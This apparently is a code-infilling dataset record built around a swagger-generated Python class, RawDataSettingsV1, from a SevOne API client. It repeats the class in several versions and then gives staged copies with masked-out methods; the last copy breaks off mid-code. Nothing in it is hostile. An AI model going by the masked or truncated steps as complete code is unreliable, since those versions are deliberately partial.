attribute_map = {'data_aggregation_setting': 'dataAggregationSetting',
'raw_data_setting': 'rawDataSetting', 'units_setting':
'unitsSetting', 'work_hours_setting': 'workHoursSetting'}
def __init__(self, data_aggregation_setting=None, raw_data_setting=None,
units_setting=None, work_hours_setting=None):
"""RawDataSettingsV1 - a model defined in Swagger"""
self._data_aggregation_setting = None
self._raw_data_setting = None
self._units_setting = None
self._work_hours_setting = None
self.discriminator = None
if data_aggregation_setting is not None:
self.data_aggregation_setting = data_aggregation_setting
if raw_data_setting is not None:
self.raw_data_setting = raw_data_setting
if units_setting is not None:
self.units_setting = units_setting
if work_hours_setting is not None:
self.work_hours_setting = work_hours_setting
@property
def data_aggregation_setting(self):
"""Gets the data_aggregation_setting of this RawDataSettingsV1. # noqa: E501
:return: The data_aggregation_setting of this RawDataSettingsV1. # noqa: E501
:rtype: DataAggregationSetting
"""
return self._data_aggregation_setting
@data_aggregation_setting.setter
def data_aggregation_setting(self, data_aggregation_setting):
"""Sets the data_aggregation_setting of this RawDataSettingsV1.
:param data_aggregation_setting: The data_aggregation_setting of this RawDataSettingsV1. # noqa: E501
:type: DataAggregationSetting
"""
self._data_aggregation_setting = data_aggregation_setting
@property
def raw_data_setting(self):
"""Gets the raw_data_setting of this RawDataSettingsV1. # noqa: E501
:return: The raw_data_setting of this RawDataSettingsV1. # noqa: E501
:rtype: RawDataSettingV1
"""
return self._raw_data_setting
@raw_data_setting.setter
def raw_data_setting(self, raw_data_setting):
"""Sets the raw_data_setting of this RawDataSettingsV1.
:param raw_data_setting: The raw_data_setting of this RawDataSettingsV1. # noqa: E501
:type: RawDataSettingV1
"""
self._raw_data_setting = raw_data_setting
@property
def units_setting(self):
"""Gets the units_setting of this RawDataSettingsV1. # noqa: E501
:return: The units_setting of this RawDataSettingsV1. # noqa: E501
:rtype: UnitsSetting
"""
return self._units_setting
@units_setting.setter
def units_setting(self, units_setting):
"""Sets the units_setting of this RawDataSettingsV1.
:param units_setting: The units_setting of this RawDataSettingsV1. # noqa: E501
:type: UnitsSetting
"""
self._units_setting = units_setting
@property
def work_hours_setting(self):
"""Gets the work_hours_setting of this RawDataSettingsV1. # noqa: E501
:return: The work_hours_setting of this RawDataSettingsV1. # noqa: E501
:rtype: WorkHoursSetting
"""
return self._work_hours_setting
@work_hours_setting.setter
def work_hours_setting(self, work_hours_setting):
"""Sets the work_hours_setting of this RawDataSettingsV1.
:param work_hours_setting: The work_hours_setting of this RawDataSettingsV1. # noqa: E501
:type: WorkHoursSetting
"""
self._work_hours_setting = work_hours_setting
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(lambda x: x.to_dict() if hasattr(x,
'to_dict') else x, value))
elif hasattr(value, 'to_dict'):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(lambda item: (item[0], item[1].
to_dict()) if hasattr(item[1], 'to_dict') else item,
value.items()))
else:
result[attr] = value
if issubclass(RawDataSettingsV1, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, RawDataSettingsV1):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
<|reserved_special_token_1|>
<|reserved_special_token_0|>
import pprint
import re
import six
from swagger_client.models.data_aggregation_setting import DataAggregationSetting
from swagger_client.models.raw_data_setting_v1 import RawDataSettingV1
from swagger_client.models.units_setting import UnitsSetting
from swagger_client.models.work_hours_setting import WorkHoursSetting
class RawDataSettingsV1(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {'data_aggregation_setting': 'DataAggregationSetting',
'raw_data_setting': 'RawDataSettingV1', 'units_setting':
'UnitsSetting', 'work_hours_setting': 'WorkHoursSetting'}
attribute_map = {'data_aggregation_setting': 'dataAggregationSetting',
'raw_data_setting': 'rawDataSetting', 'units_setting':
'unitsSetting', 'work_hours_setting': 'workHoursSetting'}
def __init__(self, data_aggregation_setting=None, raw_data_setting=None,
units_setting=None, work_hours_setting=None):
"""RawDataSettingsV1 - a model defined in Swagger"""
self._data_aggregation_setting = None
self._raw_data_setting = None
self._units_setting = None
self._work_hours_setting = None
self.discriminator = None
if data_aggregation_setting is not None:
self.data_aggregation_setting = data_aggregation_setting
if raw_data_setting is not None:
self.raw_data_setting = raw_data_setting
if units_setting is not None:
self.units_setting = units_setting
if work_hours_setting is not None:
self.work_hours_setting = work_hours_setting
@property
def data_aggregation_setting(self):
"""Gets the data_aggregation_setting of this RawDataSettingsV1. # noqa: E501
:return: The data_aggregation_setting of this RawDataSettingsV1. # noqa: E501
:rtype: DataAggregationSetting
"""
return self._data_aggregation_setting
@data_aggregation_setting.setter
def data_aggregation_setting(self, data_aggregation_setting):
"""Sets the data_aggregation_setting of this RawDataSettingsV1.
:param data_aggregation_setting: The data_aggregation_setting of this RawDataSettingsV1. # noqa: E501
:type: DataAggregationSetting
"""
self._data_aggregation_setting = data_aggregation_setting
@property
def raw_data_setting(self):
"""Gets the raw_data_setting of this RawDataSettingsV1. # noqa: E501
:return: The raw_data_setting of this RawDataSettingsV1. # noqa: E501
:rtype: RawDataSettingV1
"""
return self._raw_data_setting
@raw_data_setting.setter
def raw_data_setting(self, raw_data_setting):
"""Sets the raw_data_setting of this RawDataSettingsV1.
:param raw_data_setting: The raw_data_setting of this RawDataSettingsV1. # noqa: E501
:type: RawDataSettingV1
"""
self._raw_data_setting = raw_data_setting
@property
def units_setting(self):
"""Gets the units_setting of this RawDataSettingsV1. # noqa: E501
:return: The units_setting of this RawDataSettingsV1. # noqa: E501
:rtype: UnitsSetting
"""
return self._units_setting
@units_setting.setter
def units_setting(self, units_setting):
"""Sets the units_setting of this RawDataSettingsV1.
:param units_setting: The units_setting of this RawDataSettingsV1. # noqa: E501
:type: UnitsSetting
"""
self._units_setting = units_setting
@property
def work_hours_setting(self):
"""Gets the work_hours_setting of this RawDataSettingsV1. # noqa: E501
:return: The work_hours_setting of this RawDataSettingsV1. # noqa: E501
:rtype: WorkHoursSetting
"""
return self._work_hours_setting
@work_hours_setting.setter
def work_hours_setting(self, work_hours_setting):
"""Sets the work_hours_setting of this RawDataSettingsV1.
:param work_hours_setting: The work_hours_setting of this RawDataSettingsV1. # noqa: E501
:type: WorkHoursSetting
"""
self._work_hours_setting = work_hours_setting
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(lambda x: x.to_dict() if hasattr(x,
'to_dict') else x, value))
elif hasattr(value, 'to_dict'):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(lambda item: (item[0], item[1].
to_dict()) if hasattr(item[1], 'to_dict') else item,
value.items()))
else:
result[attr] = value
if issubclass(RawDataSettingsV1, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, RawDataSettingsV1):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
<|reserved_special_token_1|>
# coding: utf-8
"""
SevOne API Documentation
Supported endpoints by the new RESTful API # noqa: E501
OpenAPI spec version: 2.1.18, Hash: db562e6
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
from swagger_client.models.data_aggregation_setting import DataAggregationSetting # noqa: F401,E501
from swagger_client.models.raw_data_setting_v1 import RawDataSettingV1 # noqa: F401,E501
from swagger_client.models.units_setting import UnitsSetting # noqa: F401,E501
from swagger_client.models.work_hours_setting import WorkHoursSetting # noqa: F401,E501
class RawDataSettingsV1(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'data_aggregation_setting': 'DataAggregationSetting',
'raw_data_setting': 'RawDataSettingV1',
'units_setting': 'UnitsSetting',
'work_hours_setting': 'WorkHoursSetting'
}
attribute_map = {
'data_aggregation_setting': 'dataAggregationSetting',
'raw_data_setting': 'rawDataSetting',
'units_setting': 'unitsSetting',
'work_hours_setting': 'workHoursSetting'
}
def __init__(self, data_aggregation_setting=None, raw_data_setting=None, units_setting=None, work_hours_setting=None): # noqa: E501
"""RawDataSettingsV1 - a model defined in Swagger""" # noqa: E501
self._data_aggregation_setting = None
self._raw_data_setting = None
self._units_setting = None
self._work_hours_setting = None
self.discriminator = None
if data_aggregation_setting is not None:
self.data_aggregation_setting = data_aggregation_setting
if raw_data_setting is not None:
self.raw_data_setting = raw_data_setting
if units_setting is not None:
self.units_setting = units_setting
if work_hours_setting is not None:
self.work_hours_setting = work_hours_setting
@property
def data_aggregation_setting(self):
"""Gets the data_aggregation_setting of this RawDataSettingsV1. # noqa: E501
:return: The data_aggregation_setting of this RawDataSettingsV1. # noqa: E501
:rtype: DataAggregationSetting
"""
return self._data_aggregation_setting
@data_aggregation_setting.setter
def data_aggregation_setting(self, data_aggregation_setting):
"""Sets the data_aggregation_setting of this RawDataSettingsV1.
:param data_aggregation_setting: The data_aggregation_setting of this RawDataSettingsV1. # noqa: E501
:type: DataAggregationSetting
"""
self._data_aggregation_setting = data_aggregation_setting
@property
def raw_data_setting(self):
"""Gets the raw_data_setting of this RawDataSettingsV1. # noqa: E501
:return: The raw_data_setting of this RawDataSettingsV1. # noqa: E501
:rtype: RawDataSettingV1
"""
return self._raw_data_setting
@raw_data_setting.setter
def raw_data_setting(self, raw_data_setting):
"""Sets the raw_data_setting of this RawDataSettingsV1.
:param raw_data_setting: The raw_data_setting of this RawDataSettingsV1. # noqa: E501
:type: RawDataSettingV1
"""
self._raw_data_setting = raw_data_setting
@property
def units_setting(self):
"""Gets the units_setting of this RawDataSettingsV1. # noqa: E501
:return: The units_setting of this RawDataSettingsV1. # noqa: E501
:rtype: UnitsSetting
"""
return self._units_setting
@units_setting.setter
def units_setting(self, units_setting):
"""Sets the units_setting of this RawDataSettingsV1.
:param units_setting: The units_setting of this RawDataSettingsV1. # noqa: E501
:type: UnitsSetting
"""
self._units_setting = units_setting
@property
def work_hours_setting(self):
"""Gets the work_hours_setting of this RawDataSettingsV1. # noqa: E501
:return: The work_hours_setting of this RawDataSettingsV1. # noqa: E501
:rtype: WorkHoursSetting
"""
return self._work_hours_setting
@work_hours_setting.setter
def work_hours_setting(self, work_hours_setting):
"""Sets the work_hours_setting of this RawDataSettingsV1.
:param work_hours_setting: The work_hours_setting of this RawDataSettingsV1. # noqa: E501
:type: WorkHoursSetting
"""
self._work_hours_setting = work_hours_setting
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(RawDataSettingsV1, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, RawDataSettingsV1):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
|
flexible
|
{
"blob_id": "25d4fa44cb17048301076391d5d67ae0b0812ac7",
"index": 3988,
"step-1": "<mask token>\n\n\nclass RawDataSettingsV1(object):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def __init__(self, data_aggregation_setting=None, raw_data_setting=None,\n units_setting=None, work_hours_setting=None):\n \"\"\"RawDataSettingsV1 - a model defined in Swagger\"\"\"\n self._data_aggregation_setting = None\n self._raw_data_setting = None\n self._units_setting = None\n self._work_hours_setting = None\n self.discriminator = None\n if data_aggregation_setting is not None:\n self.data_aggregation_setting = data_aggregation_setting\n if raw_data_setting is not None:\n self.raw_data_setting = raw_data_setting\n if units_setting is not None:\n self.units_setting = units_setting\n if work_hours_setting is not None:\n self.work_hours_setting = work_hours_setting\n <mask token>\n <mask token>\n\n @property\n def raw_data_setting(self):\n \"\"\"Gets the raw_data_setting of this RawDataSettingsV1. # noqa: E501\n\n\n :return: The raw_data_setting of this RawDataSettingsV1. # noqa: E501\n :rtype: RawDataSettingV1\n \"\"\"\n return self._raw_data_setting\n <mask token>\n\n @property\n def units_setting(self):\n \"\"\"Gets the units_setting of this RawDataSettingsV1. # noqa: E501\n\n\n :return: The units_setting of this RawDataSettingsV1. # noqa: E501\n :rtype: UnitsSetting\n \"\"\"\n return self._units_setting\n\n @units_setting.setter\n def units_setting(self, units_setting):\n \"\"\"Sets the units_setting of this RawDataSettingsV1.\n\n\n :param units_setting: The units_setting of this RawDataSettingsV1. # noqa: E501\n :type: UnitsSetting\n \"\"\"\n self._units_setting = units_setting\n\n @property\n def work_hours_setting(self):\n \"\"\"Gets the work_hours_setting of this RawDataSettingsV1. # noqa: E501\n\n\n :return: The work_hours_setting of this RawDataSettingsV1. 
# noqa: E501\n :rtype: WorkHoursSetting\n \"\"\"\n return self._work_hours_setting\n <mask token>\n <mask token>\n <mask token>\n\n def __repr__(self):\n \"\"\"For `print` and `pprint`\"\"\"\n return self.to_str()\n\n def __eq__(self, other):\n \"\"\"Returns true if both objects are equal\"\"\"\n if not isinstance(other, RawDataSettingsV1):\n return False\n return self.__dict__ == other.__dict__\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass RawDataSettingsV1(object):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def __init__(self, data_aggregation_setting=None, raw_data_setting=None,\n units_setting=None, work_hours_setting=None):\n \"\"\"RawDataSettingsV1 - a model defined in Swagger\"\"\"\n self._data_aggregation_setting = None\n self._raw_data_setting = None\n self._units_setting = None\n self._work_hours_setting = None\n self.discriminator = None\n if data_aggregation_setting is not None:\n self.data_aggregation_setting = data_aggregation_setting\n if raw_data_setting is not None:\n self.raw_data_setting = raw_data_setting\n if units_setting is not None:\n self.units_setting = units_setting\n if work_hours_setting is not None:\n self.work_hours_setting = work_hours_setting\n\n @property\n def data_aggregation_setting(self):\n \"\"\"Gets the data_aggregation_setting of this RawDataSettingsV1. # noqa: E501\n\n\n :return: The data_aggregation_setting of this RawDataSettingsV1. # noqa: E501\n :rtype: DataAggregationSetting\n \"\"\"\n return self._data_aggregation_setting\n\n @data_aggregation_setting.setter\n def data_aggregation_setting(self, data_aggregation_setting):\n \"\"\"Sets the data_aggregation_setting of this RawDataSettingsV1.\n\n\n :param data_aggregation_setting: The data_aggregation_setting of this RawDataSettingsV1. # noqa: E501\n :type: DataAggregationSetting\n \"\"\"\n self._data_aggregation_setting = data_aggregation_setting\n\n @property\n def raw_data_setting(self):\n \"\"\"Gets the raw_data_setting of this RawDataSettingsV1. # noqa: E501\n\n\n :return: The raw_data_setting of this RawDataSettingsV1. # noqa: E501\n :rtype: RawDataSettingV1\n \"\"\"\n return self._raw_data_setting\n\n @raw_data_setting.setter\n def raw_data_setting(self, raw_data_setting):\n \"\"\"Sets the raw_data_setting of this RawDataSettingsV1.\n\n\n :param raw_data_setting: The raw_data_setting of this RawDataSettingsV1. 
# noqa: E501\n :type: RawDataSettingV1\n \"\"\"\n self._raw_data_setting = raw_data_setting\n\n @property\n def units_setting(self):\n \"\"\"Gets the units_setting of this RawDataSettingsV1. # noqa: E501\n\n\n :return: The units_setting of this RawDataSettingsV1. # noqa: E501\n :rtype: UnitsSetting\n \"\"\"\n return self._units_setting\n\n @units_setting.setter\n def units_setting(self, units_setting):\n \"\"\"Sets the units_setting of this RawDataSettingsV1.\n\n\n :param units_setting: The units_setting of this RawDataSettingsV1. # noqa: E501\n :type: UnitsSetting\n \"\"\"\n self._units_setting = units_setting\n\n @property\n def work_hours_setting(self):\n \"\"\"Gets the work_hours_setting of this RawDataSettingsV1. # noqa: E501\n\n\n :return: The work_hours_setting of this RawDataSettingsV1. # noqa: E501\n :rtype: WorkHoursSetting\n \"\"\"\n return self._work_hours_setting\n\n @work_hours_setting.setter\n def work_hours_setting(self, work_hours_setting):\n \"\"\"Sets the work_hours_setting of this RawDataSettingsV1.\n\n\n :param work_hours_setting: The work_hours_setting of this RawDataSettingsV1. 
# noqa: E501\n :type: WorkHoursSetting\n \"\"\"\n self._work_hours_setting = work_hours_setting\n\n def to_dict(self):\n \"\"\"Returns the model properties as a dict\"\"\"\n result = {}\n for attr, _ in six.iteritems(self.swagger_types):\n value = getattr(self, attr)\n if isinstance(value, list):\n result[attr] = list(map(lambda x: x.to_dict() if hasattr(x,\n 'to_dict') else x, value))\n elif hasattr(value, 'to_dict'):\n result[attr] = value.to_dict()\n elif isinstance(value, dict):\n result[attr] = dict(map(lambda item: (item[0], item[1].\n to_dict()) if hasattr(item[1], 'to_dict') else item,\n value.items()))\n else:\n result[attr] = value\n if issubclass(RawDataSettingsV1, dict):\n for key, value in self.items():\n result[key] = value\n return result\n\n def to_str(self):\n \"\"\"Returns the string representation of the model\"\"\"\n return pprint.pformat(self.to_dict())\n\n def __repr__(self):\n \"\"\"For `print` and `pprint`\"\"\"\n return self.to_str()\n\n def __eq__(self, other):\n \"\"\"Returns true if both objects are equal\"\"\"\n if not isinstance(other, RawDataSettingsV1):\n return False\n return self.__dict__ == other.__dict__\n\n def __ne__(self, other):\n \"\"\"Returns true if both objects are not equal\"\"\"\n return not self == other\n",
"step-3": "<mask token>\n\n\nclass RawDataSettingsV1(object):\n \"\"\"NOTE: This class is auto generated by the swagger code generator program.\n\n Do not edit the class manually.\n \"\"\"\n \"\"\"\n Attributes:\n swagger_types (dict): The key is attribute name\n and the value is attribute type.\n attribute_map (dict): The key is attribute name\n and the value is json key in definition.\n \"\"\"\n swagger_types = {'data_aggregation_setting': 'DataAggregationSetting',\n 'raw_data_setting': 'RawDataSettingV1', 'units_setting':\n 'UnitsSetting', 'work_hours_setting': 'WorkHoursSetting'}\n attribute_map = {'data_aggregation_setting': 'dataAggregationSetting',\n 'raw_data_setting': 'rawDataSetting', 'units_setting':\n 'unitsSetting', 'work_hours_setting': 'workHoursSetting'}\n\n def __init__(self, data_aggregation_setting=None, raw_data_setting=None,\n units_setting=None, work_hours_setting=None):\n \"\"\"RawDataSettingsV1 - a model defined in Swagger\"\"\"\n self._data_aggregation_setting = None\n self._raw_data_setting = None\n self._units_setting = None\n self._work_hours_setting = None\n self.discriminator = None\n if data_aggregation_setting is not None:\n self.data_aggregation_setting = data_aggregation_setting\n if raw_data_setting is not None:\n self.raw_data_setting = raw_data_setting\n if units_setting is not None:\n self.units_setting = units_setting\n if work_hours_setting is not None:\n self.work_hours_setting = work_hours_setting\n\n @property\n def data_aggregation_setting(self):\n \"\"\"Gets the data_aggregation_setting of this RawDataSettingsV1. # noqa: E501\n\n\n :return: The data_aggregation_setting of this RawDataSettingsV1. 
# noqa: E501\n :rtype: DataAggregationSetting\n \"\"\"\n return self._data_aggregation_setting\n\n @data_aggregation_setting.setter\n def data_aggregation_setting(self, data_aggregation_setting):\n \"\"\"Sets the data_aggregation_setting of this RawDataSettingsV1.\n\n\n :param data_aggregation_setting: The data_aggregation_setting of this RawDataSettingsV1. # noqa: E501\n :type: DataAggregationSetting\n \"\"\"\n self._data_aggregation_setting = data_aggregation_setting\n\n @property\n def raw_data_setting(self):\n \"\"\"Gets the raw_data_setting of this RawDataSettingsV1. # noqa: E501\n\n\n :return: The raw_data_setting of this RawDataSettingsV1. # noqa: E501\n :rtype: RawDataSettingV1\n \"\"\"\n return self._raw_data_setting\n\n @raw_data_setting.setter\n def raw_data_setting(self, raw_data_setting):\n \"\"\"Sets the raw_data_setting of this RawDataSettingsV1.\n\n\n :param raw_data_setting: The raw_data_setting of this RawDataSettingsV1. # noqa: E501\n :type: RawDataSettingV1\n \"\"\"\n self._raw_data_setting = raw_data_setting\n\n @property\n def units_setting(self):\n \"\"\"Gets the units_setting of this RawDataSettingsV1. # noqa: E501\n\n\n :return: The units_setting of this RawDataSettingsV1. # noqa: E501\n :rtype: UnitsSetting\n \"\"\"\n return self._units_setting\n\n @units_setting.setter\n def units_setting(self, units_setting):\n \"\"\"Sets the units_setting of this RawDataSettingsV1.\n\n\n :param units_setting: The units_setting of this RawDataSettingsV1. # noqa: E501\n :type: UnitsSetting\n \"\"\"\n self._units_setting = units_setting\n\n @property\n def work_hours_setting(self):\n \"\"\"Gets the work_hours_setting of this RawDataSettingsV1. # noqa: E501\n\n\n :return: The work_hours_setting of this RawDataSettingsV1. 
# noqa: E501\n :rtype: WorkHoursSetting\n \"\"\"\n return self._work_hours_setting\n\n @work_hours_setting.setter\n def work_hours_setting(self, work_hours_setting):\n \"\"\"Sets the work_hours_setting of this RawDataSettingsV1.\n\n\n :param work_hours_setting: The work_hours_setting of this RawDataSettingsV1. # noqa: E501\n :type: WorkHoursSetting\n \"\"\"\n self._work_hours_setting = work_hours_setting\n\n def to_dict(self):\n \"\"\"Returns the model properties as a dict\"\"\"\n result = {}\n for attr, _ in six.iteritems(self.swagger_types):\n value = getattr(self, attr)\n if isinstance(value, list):\n result[attr] = list(map(lambda x: x.to_dict() if hasattr(x,\n 'to_dict') else x, value))\n elif hasattr(value, 'to_dict'):\n result[attr] = value.to_dict()\n elif isinstance(value, dict):\n result[attr] = dict(map(lambda item: (item[0], item[1].\n to_dict()) if hasattr(item[1], 'to_dict') else item,\n value.items()))\n else:\n result[attr] = value\n if issubclass(RawDataSettingsV1, dict):\n for key, value in self.items():\n result[key] = value\n return result\n\n def to_str(self):\n \"\"\"Returns the string representation of the model\"\"\"\n return pprint.pformat(self.to_dict())\n\n def __repr__(self):\n \"\"\"For `print` and `pprint`\"\"\"\n return self.to_str()\n\n def __eq__(self, other):\n \"\"\"Returns true if both objects are equal\"\"\"\n if not isinstance(other, RawDataSettingsV1):\n return False\n return self.__dict__ == other.__dict__\n\n def __ne__(self, other):\n \"\"\"Returns true if both objects are not equal\"\"\"\n return not self == other\n",
"step-4": "<mask token>\nimport pprint\nimport re\nimport six\nfrom swagger_client.models.data_aggregation_setting import DataAggregationSetting\nfrom swagger_client.models.raw_data_setting_v1 import RawDataSettingV1\nfrom swagger_client.models.units_setting import UnitsSetting\nfrom swagger_client.models.work_hours_setting import WorkHoursSetting\n\n\nclass RawDataSettingsV1(object):\n \"\"\"NOTE: This class is auto generated by the swagger code generator program.\n\n Do not edit the class manually.\n \"\"\"\n \"\"\"\n Attributes:\n swagger_types (dict): The key is attribute name\n and the value is attribute type.\n attribute_map (dict): The key is attribute name\n and the value is json key in definition.\n \"\"\"\n swagger_types = {'data_aggregation_setting': 'DataAggregationSetting',\n 'raw_data_setting': 'RawDataSettingV1', 'units_setting':\n 'UnitsSetting', 'work_hours_setting': 'WorkHoursSetting'}\n attribute_map = {'data_aggregation_setting': 'dataAggregationSetting',\n 'raw_data_setting': 'rawDataSetting', 'units_setting':\n 'unitsSetting', 'work_hours_setting': 'workHoursSetting'}\n\n def __init__(self, data_aggregation_setting=None, raw_data_setting=None,\n units_setting=None, work_hours_setting=None):\n \"\"\"RawDataSettingsV1 - a model defined in Swagger\"\"\"\n self._data_aggregation_setting = None\n self._raw_data_setting = None\n self._units_setting = None\n self._work_hours_setting = None\n self.discriminator = None\n if data_aggregation_setting is not None:\n self.data_aggregation_setting = data_aggregation_setting\n if raw_data_setting is not None:\n self.raw_data_setting = raw_data_setting\n if units_setting is not None:\n self.units_setting = units_setting\n if work_hours_setting is not None:\n self.work_hours_setting = work_hours_setting\n\n @property\n def data_aggregation_setting(self):\n \"\"\"Gets the data_aggregation_setting of this RawDataSettingsV1. # noqa: E501\n\n\n :return: The data_aggregation_setting of this RawDataSettingsV1. 
# noqa: E501\n :rtype: DataAggregationSetting\n \"\"\"\n return self._data_aggregation_setting\n\n @data_aggregation_setting.setter\n def data_aggregation_setting(self, data_aggregation_setting):\n \"\"\"Sets the data_aggregation_setting of this RawDataSettingsV1.\n\n\n :param data_aggregation_setting: The data_aggregation_setting of this RawDataSettingsV1. # noqa: E501\n :type: DataAggregationSetting\n \"\"\"\n self._data_aggregation_setting = data_aggregation_setting\n\n @property\n def raw_data_setting(self):\n \"\"\"Gets the raw_data_setting of this RawDataSettingsV1. # noqa: E501\n\n\n :return: The raw_data_setting of this RawDataSettingsV1. # noqa: E501\n :rtype: RawDataSettingV1\n \"\"\"\n return self._raw_data_setting\n\n @raw_data_setting.setter\n def raw_data_setting(self, raw_data_setting):\n \"\"\"Sets the raw_data_setting of this RawDataSettingsV1.\n\n\n :param raw_data_setting: The raw_data_setting of this RawDataSettingsV1. # noqa: E501\n :type: RawDataSettingV1\n \"\"\"\n self._raw_data_setting = raw_data_setting\n\n @property\n def units_setting(self):\n \"\"\"Gets the units_setting of this RawDataSettingsV1. # noqa: E501\n\n\n :return: The units_setting of this RawDataSettingsV1. # noqa: E501\n :rtype: UnitsSetting\n \"\"\"\n return self._units_setting\n\n @units_setting.setter\n def units_setting(self, units_setting):\n \"\"\"Sets the units_setting of this RawDataSettingsV1.\n\n\n :param units_setting: The units_setting of this RawDataSettingsV1. # noqa: E501\n :type: UnitsSetting\n \"\"\"\n self._units_setting = units_setting\n\n @property\n def work_hours_setting(self):\n \"\"\"Gets the work_hours_setting of this RawDataSettingsV1. # noqa: E501\n\n\n :return: The work_hours_setting of this RawDataSettingsV1. 
# noqa: E501\n :rtype: WorkHoursSetting\n \"\"\"\n return self._work_hours_setting\n\n @work_hours_setting.setter\n def work_hours_setting(self, work_hours_setting):\n \"\"\"Sets the work_hours_setting of this RawDataSettingsV1.\n\n\n :param work_hours_setting: The work_hours_setting of this RawDataSettingsV1. # noqa: E501\n :type: WorkHoursSetting\n \"\"\"\n self._work_hours_setting = work_hours_setting\n\n def to_dict(self):\n \"\"\"Returns the model properties as a dict\"\"\"\n result = {}\n for attr, _ in six.iteritems(self.swagger_types):\n value = getattr(self, attr)\n if isinstance(value, list):\n result[attr] = list(map(lambda x: x.to_dict() if hasattr(x,\n 'to_dict') else x, value))\n elif hasattr(value, 'to_dict'):\n result[attr] = value.to_dict()\n elif isinstance(value, dict):\n result[attr] = dict(map(lambda item: (item[0], item[1].\n to_dict()) if hasattr(item[1], 'to_dict') else item,\n value.items()))\n else:\n result[attr] = value\n if issubclass(RawDataSettingsV1, dict):\n for key, value in self.items():\n result[key] = value\n return result\n\n def to_str(self):\n \"\"\"Returns the string representation of the model\"\"\"\n return pprint.pformat(self.to_dict())\n\n def __repr__(self):\n \"\"\"For `print` and `pprint`\"\"\"\n return self.to_str()\n\n def __eq__(self, other):\n \"\"\"Returns true if both objects are equal\"\"\"\n if not isinstance(other, RawDataSettingsV1):\n return False\n return self.__dict__ == other.__dict__\n\n def __ne__(self, other):\n \"\"\"Returns true if both objects are not equal\"\"\"\n return not self == other\n",
"step-5": "# coding: utf-8\n\n\"\"\"\n SevOne API Documentation\n\n Supported endpoints by the new RESTful API # noqa: E501\n\n OpenAPI spec version: 2.1.18, Hash: db562e6\n \n Generated by: https://github.com/swagger-api/swagger-codegen.git\n\"\"\"\n\n\nimport pprint\nimport re # noqa: F401\n\nimport six\n\nfrom swagger_client.models.data_aggregation_setting import DataAggregationSetting # noqa: F401,E501\nfrom swagger_client.models.raw_data_setting_v1 import RawDataSettingV1 # noqa: F401,E501\nfrom swagger_client.models.units_setting import UnitsSetting # noqa: F401,E501\nfrom swagger_client.models.work_hours_setting import WorkHoursSetting # noqa: F401,E501\n\n\nclass RawDataSettingsV1(object):\n \"\"\"NOTE: This class is auto generated by the swagger code generator program.\n\n Do not edit the class manually.\n \"\"\"\n\n \"\"\"\n Attributes:\n swagger_types (dict): The key is attribute name\n and the value is attribute type.\n attribute_map (dict): The key is attribute name\n and the value is json key in definition.\n \"\"\"\n swagger_types = {\n 'data_aggregation_setting': 'DataAggregationSetting',\n 'raw_data_setting': 'RawDataSettingV1',\n 'units_setting': 'UnitsSetting',\n 'work_hours_setting': 'WorkHoursSetting'\n }\n\n attribute_map = {\n 'data_aggregation_setting': 'dataAggregationSetting',\n 'raw_data_setting': 'rawDataSetting',\n 'units_setting': 'unitsSetting',\n 'work_hours_setting': 'workHoursSetting'\n }\n\n def __init__(self, data_aggregation_setting=None, raw_data_setting=None, units_setting=None, work_hours_setting=None): # noqa: E501\n \"\"\"RawDataSettingsV1 - a model defined in Swagger\"\"\" # noqa: E501\n\n self._data_aggregation_setting = None\n self._raw_data_setting = None\n self._units_setting = None\n self._work_hours_setting = None\n self.discriminator = None\n\n if data_aggregation_setting is not None:\n self.data_aggregation_setting = data_aggregation_setting\n if raw_data_setting is not None:\n self.raw_data_setting = 
